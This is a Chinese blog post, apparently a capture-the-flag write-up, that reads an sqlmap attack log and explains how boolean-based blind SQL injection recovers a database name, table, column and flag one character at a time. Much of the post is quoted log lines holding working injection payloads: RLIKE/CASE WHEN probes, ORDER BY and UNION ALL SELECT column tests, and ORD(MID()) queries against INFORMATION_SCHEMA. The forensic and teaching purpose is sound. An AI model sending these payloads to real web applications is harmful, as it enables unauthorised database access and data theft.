SQL注入 Misc

SQLmap盲注原理细分

Posted by SGQ on March 19, 2020

简介:

Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞,目前支持 MySQL、 Oracle、 PostgreSQL、 Microsoft SQL Server、 Microsoft Access 等主流数据库。

Sqlmap 使用 5 种 SQL 注入技术(不加参数默认测试所有注入技术):

基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

联合查询注入,可以使用union的情况下的注入。

堆查询注入,可以同时执行多条语句的执行时的注入。

题目:

仔细观察已受到攻击的服务器上的SQLmap盲注日志,逐字节分析得到flag

考察点:

SQLmap的盲注原理。此题是基于布尔判断的盲注。

知识点:

SQLmap的盲注过程,与手工注入差不多,大概就是先判断是否为注入点,构造payload,然后再order by 判断列名个数,再用union 联合查询获得数据库名,再判断表名,在得到列名,最后得到具体数据。

解题过程:

1. 下载access.log文件,用记事本打开观察会非常不方便,先在线url转码再可以把它复制到word里,使用全部替换,把union全部标上颜色,这样比较醒目,会看到sqlmap什么时候开始进行union查询。

2.

192.168.247.129 - - [24/Dec/2017:08:21:19  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (2783=2783) THEN 0x61646d696e ELSE 0x28 END))-- pCIJ&password=b HTTP/1.1" 200 183 "http://192.168.247.130:8899/" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:19  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (7215=9005) THEN 0x61646d696e ELSE 0x28 END))-- hctR&password=b HTTP/1.1" 200 182 "http://192.168.247.130:8899/" "sqlmap/1.1.12#stable (http://sqlmap.org)"

在此处注入成功.

192.168.247.129 - - [24/Dec/2017:08:21:23  0000] "GET /?username=admin' ORDER BY 1-- Hjkp&password=b HTTP/1.1" 200 215 "http://192.168.247.130:8899/" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:23  0000] "GET /?username=admin' UNION ALL SELECT NULL-- DOGW&password=b HTTP/1.1" 200 182 "http://192.168.247.130:8899/" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:23  0000] "GET /?username=admin' UNION ALL SELECT NULL,NULL-- TeAz&password=b HTTP/1.1" 200 182 "http://192.168.247.130:8899/" "sqlmap/1.1.12#stable (http://sqlmap.org)"

此处是在通过order by 盲目的猜,有几个字段数,如果成功则返回是。

3.

192.168.247.129 - - [24/Dec/2017:08:21:23  0000] "GET /?username=admin' UNION ALL SELECT CONCAT(0x717a7a6271,0x6e796e634c66504a7163556e4c59757451546d79536b4e4d48535559764e6c686e55596966657377,0x7170767071),NULL,NULL-- sTlf&password=b HTTP/1.1" 200 227 "http://192.168.247.130:8899/" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:23  0000] "GET /?username=admin' UNION ALL SELECT NULL,CONCAT(0x717a7a6271,0x667165474b674f67557770626b4f476e575149536b6473496656616a446d494f65456b475a6d6468,0x7170767071),NULL-- Bnun&password=b HTTP/1.1" 200 227 "http://192.168.247.130:8899/" "sqlmap/1.1.12#stable (http://sqlmap.org)"

此处是在判断出字段数之后,判断回显点。

4. 通过逐个字节猜ascii判断数据库名,最后得到数据库名,0x77616c6177616c61,walawala。

1192.168.247.129 - - [24/Dec/2017:08:21:45  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),9,1))>48) THEN 0x61646d696e ELSE 0x28 END))-- bAXi&password=b HTTP/1.1" 200 182 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:45  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),9,1))>1) THEN 0x61646d696e ELSE 0x28 END))-- bAXi&password=b HTTP/1.1" 200 182 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

5. 通过逐个字节猜ascii判断表名。最后得到表名,16进制转换为字符。fl4g。

192.168.247.129 - - [24/Dec/2017:08:21:49  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x77616c6177616c61 LIMIT 1,1),5,1))>114) THEN 0x61646d696e ELSE 0x28 END))-- RcZY&password=b HTTP/1.1" 200 183 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:49  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x77616c6177616c61 LIMIT 1,1),5,1))>115) THEN 0x61646d696e ELSE 0x28 END))-- RcZY&password=b HTTP/1.1" 200 182 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

6. 猜列名,通过逐字节比较猜每个列名的ascii,依次判断,最后确定为walawala.fl4g

192.168.247.129 - - [24/Dec/2017:08:21:53  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x666c3467 AND table_schema=0x77616c6177616c61 LIMIT 0,1),5,1))>48) THEN 0x61646d696e ELSE 0x28 END))-- IRsT&password=b HTTP/1.1" 200 182 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

7. 读出数据flag。例如:

192.168.247.129 - - [24/Dec/2017:08:21:53  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM walawala.fl4g ORDER BY flag LIMIT 0,1),1,1))>64) THEN 0x61646d696e ELSE 0x28 END))-- eYTO&password=b HTTP/1.1" 200 183 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"


192.168.247.129 - - [24/Dec/2017:08:21:53  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM walawala.fl4g ORDER BY flag LIMIT 0,1),1,1))>96) THEN 0x61646d696e ELSE 0x28 END))-- eYTO&password=b HTTP/1.1" 200 183 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:53  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM walawala.fl4g ORDER BY flag LIMIT 0,1),1,1))>112) THEN 0x61646d696e ELSE 0x28 END))-- eYTO&password=b HTTP/1.1" 200 182 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:53  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM walawala.fl4g ORDER BY flag LIMIT 0,1),1,1))>104) THEN 0x61646d696e ELSE 0x28 END))-- eYTO&password=b HTTP/1.1" 200 182 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:53  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM walawala.fl4g ORDER BY flag LIMIT 0,1),1,1))>100) THEN 0x61646d696e ELSE 0x28 END))-- eYTO&password=b HTTP/1.1" 200 183 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:53  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM walawala.fl4g ORDER BY flag LIMIT 0,1),1,1))>102) THEN 0x61646d696e ELSE 0x28 END))-- eYTO&password=b HTTP/1.1" 200 182 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

192.168.247.129 - - [24/Dec/2017:08:21:53  0000] "GET /?username=admin' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM walawala.fl4g ORDER BY flag LIMIT 0,1),1,1))>101) THEN 0x61646d696e ELSE 0x28 END))-- eYTO&password=b HTTP/1.1" 200 183 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"

判断flag的第一个字符ascii是否大于64,由第二句可以得到显然大于,又接着判断是否大于96,依然大于,之后判断112,说明小于等于112,之后判断104,100,102,说明比100大,小于等于102,直到最后判断101,说明比101大,可以唯一确定第一个字符的ascii为102,每个字符都如此的比较。最后可以确认flag。

参考链接(一):mysql注入细节

参考链接(二):sqlmap基于时间盲注判断原理

谢谢您的查阅,欢迎来访!

CATALOG
    FEATURED TAGS
    生活 PHP Web SQL注入 XSS FileInclude Misc GitHub 逆向 二进制炸弹 Linux Ubuntu 读书笔记 二进制 汇编语言 gdb调试器 Crypto RSA IDA 深度学习